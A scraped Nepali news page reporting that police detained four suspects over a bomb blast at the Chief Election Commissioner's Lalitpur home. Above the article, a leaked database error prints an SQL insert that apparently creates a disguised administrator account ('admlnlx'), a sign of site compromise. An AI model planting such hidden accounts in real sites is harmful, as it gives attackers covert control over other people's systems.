WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BT34bTVu4ecZY/8lCdHwPRKbTChHEw/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 00:39:26', '', 'admlnlx', 'admlnlx')

प्रमुख निर्वाचन आयुक्त यादवको घरमा बम विष्फोट गराउने ४ जना प्रहरी नियन्त्रणमा – Gaule Khabar

प्रमुख निर्वाचन आयुक्त यादवको घरमा बम विष्फोट गराउने ४ जना प्रहरी नियन्त्रणमा

प्रमुख निर्वाचन आयुक्त यादवको घरमा बम विष्फोट गराउने ४ जना प्रहरी नियन्त्रणमा

ललितपुर–प्रमुख निर्वाचन आयुक्त अयोधिप्रसाद यादवको घरमा बम विष्फोट गराएको आशंका प्रहरीले चार जनालाई नियन्त्रणमा लिएको छ । वैशाख ९ गते यादवको हात्तिवनस्थित निवासमा एउटा बम विष्फोट गराइएको थियो भने निवास परिसरमा राखिएको अर्को शंकाष्पद बस्तुलाई नेपाली सेनाको टोलीले निस्क्रिय पारेको थियो ।

प्रहरीले बम विष्फोटमा संलग्न रहेको आशंकामा ललितपुरका मोहनप्रसाद शिवाकोटी, काठमाडौंका युवराज पराजुली, शुरेन्द्र भन्ने ढकबहादुर श्रेष्ठ र भिमसेन घिमिरेलाई नियन्त्रणमा लिएको छ । ‘विष्फोटमा संलग्न चार जनालाई नियन्त्रणमा लिएका छौं’ महानगरीय प्रहरी परिसर ललितपुरका प्रमुख (एसएसपी) गणेश ऐरले भने, ‘पक्राउ परेकाहरुमाथि थप अनुसन्धान भइरहेको छ ।’

नेपाल सरकारले यादवको निवास सुरक्षार्थ खटिएका प्रहरी फिर्ता गरेपछि उनको घरमा बम विष्फोट भएको थियो । विष्फोटपछि महानगरीय प्रहरी परिसर लतिलपुरले उनको घरको सुरक्षार्थ प्रहरी परिचालन गरेको छ ।
प्रहरी स्रोतका अनुसार नेकपा (माओवादी) विप्लव समुहले विष्फोट गराएको आशंका गरिएको छ । कुनैपनी समुहले अहिलेसम्म घट्नाको जिम्मेवारी लिएको छैन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका